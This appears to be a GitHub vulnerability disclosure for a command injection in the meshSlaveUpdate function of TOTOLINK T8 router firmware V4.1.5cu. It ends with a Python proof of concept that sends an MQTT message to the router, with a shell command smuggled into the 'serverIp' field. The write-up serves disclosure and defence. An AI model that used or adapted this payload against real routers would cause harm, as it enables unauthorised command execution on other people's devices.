Skip to content

Latest commit

 

History

History
42 lines (23 loc) · 1.26 KB

meshSlaveUpdate.md

File metadata and controls

42 lines (23 loc) · 1.26 KB

A command injection vulnerability in the function meshSlaveUpdate of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

Description

A command injection vulnerability in the function meshSlaveUpdate of TOTOLINK Technology routers T8 V4.1.5cu allows attackers to execute arbitrary commands via a crafted MQTT packet.

image-20230116184500942

Firmware information

image-20230116184157081

Affected version

Version: V4.1.5cu

Vulnerability details

The T8 router opens the MQTT service

image-20230116185238612

In function meshSlaveUpdate,The "serverIp" parameter does not filter user input, which can cause command injection vulnerabilities

image-20230116191049592

POC

import paho.mqtt.client as mqtt
client = mqtt.Client()
client.connect("192.168.0.1",1883,60)
client.publish("totolink/router/meshSlaveUpdate", b'{"serverIp": ";ls>/tmp/meshSlaveUpdate.txt;"}')

image-20230116191129895